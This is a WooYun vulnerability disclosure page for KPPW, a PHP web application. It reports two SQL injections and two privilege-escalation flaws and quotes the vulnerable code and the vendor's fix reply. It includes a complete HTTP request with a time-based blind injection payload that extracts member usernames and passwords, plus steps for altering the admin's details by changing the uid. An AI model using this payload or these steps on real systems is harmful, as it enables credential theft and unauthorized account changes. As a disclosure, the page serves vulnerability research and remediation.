当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086216

漏洞标题:KPPW最新版SQL注入漏洞三(SQL注入及越权操作各两处)

相关厂商:keke.com

漏洞作者: xfkxfk

提交时间:2014-12-09 00:36

修复时间:2015-03-09 00:36

公开时间:2015-03-09 00:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-09: 细节已通知厂商并且等待厂商处理中
2014-12-10: 厂商已经确认,细节仅向厂商公开
2014-12-13: 细节向第三方安全合作伙伴开放
2015-02-03: 细节向核心白帽子及相关领域专家公开
2015-02-13: 细节向普通白帽子公开
2015-02-23: 细节向实习白帽子公开
2015-03-09: 细节向公众公开

简要描述:

KPPW最新版SQL注入漏洞三(SQL注入及越权操作各两处),附脚本

详细说明:

KPPW最新版SQL注入漏洞三(SQL注入及越权操作各两处),附脚本
第一处SQL注入
文件/control/user/account_basic.php:

if($intUserRole === 2){
......
}else{
$intAuthStatus = keke_auth_fac_class::auth_check ( "realname", $gUid );
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
if (strtotime($birthday)>=strtotime(date('Y-m-d',time()))) {
$tips['errors']['birthday'] = '出生日期不得大于或等于当前日期';
kekezu::show_msg($tips,NULL,NULL,NULL,'error');
}
if (strtoupper ( CHARSET ) == 'GBK') {
$truename = kekezu::utftogbk($truename );
}
$arrData = array(
'indus_pid' =>$indus_pid,
'indus_id' =>$indus_id,
'truename' =>$truename,
'sex' =>$sex,
'birthday' =>$birthday,
);
$objSpaceT->save($arrData,$pk);
unset($objSpaceT);
kekezu::show_msg('已保存',NULL,NULL,NULL,'ok');
}
}


这里在保存基本信息时,变量$pk进入了save函数
跟进save函数,文件/lib/inc/keke_table_class.php:

function save($fields, $pk = array()) {
foreach ( $fields as $k => $v ) {
$kk = ucfirst ( $k );
$set_query = "set" . $kk;
$this->_table_obj->$set_query ( $v );
}
$keys = array_keys ( $pk );
$key = $keys [0];
if (! empty ( $pk [$key] )) {
$this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
$edit_query = "edit_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$edit_query ();
} else {
$create_query = "create_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$create_query ();
}
if ($res) {
return $res;
} else {
return false;
}
}


当$pk[$key]不为空时,$key进入where条件,最后进入>$edit_query,进入sql语句
由于这里的key咋此系统是为全局处理的,也未加引号保护,导致sql注入
第二处SQL注入
文件/control/user/account_contact.php:

if (isset($formhash)&&kekezu::submitcheck($formhash)) {
$arrData =array(
'email' =>$email,
'mobile'=>$mobile,
'qq' =>$qq,
'msn' =>$msn,
'phone' =>$phone,
'province'=>$province,
'city'=>$city,
'area'=>$area
);
$intRes = $objSpaceT->save($arrData,$pk);


同理变量$pk进入sql语句,原理同上,导致SQL注入漏洞
有因为这里在更新用户基本信息时,where条件是根据用户数据的uid进行update
所以,这里我们可以update任意用户的基本信息了,导致越权操作
同理也能修改任意用户的联系方式
两处SQL注入,两处越权操作

漏洞证明:

发送此请求会延迟5秒返回:

POST /KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic
Content-Length: 239
Cookie: PHPSESSID=v8bshmlaa5qi5s47tnbpvulba5
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
formhash=6cb7d4&pk%5Buid%3d5529+and+if(mid((select+concat(username,password)+from+keke_witkey_member+limit+0,1),1,1)%3dchar(97),sleep(5),1)%23%5D=5529&indus_pid=-1&indus_id=-1&truename=%E4%B9%8C%E4%BA%91%E4%B8%80&sex=-1&birthday=1111-11-11


看看数据库执行结果

1.png


sql语句 成功执行
获取数据使用sqlmap即可
测试代码给出简单跑数据脚本
越权操作,这里我们注册普通用户登录
然后修改联系方式,抓包,修改uid=1,即为admin的uid

3.png


然后即可修改管理员的联系方式

2.png

修复方案:

此系统全局为过滤key,使用户不可控即可,可以考虑给key加固定的取值list

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-10 17:20

厂商回复:

已修改 QK

最新状态:

暂无


漏洞评价:

评论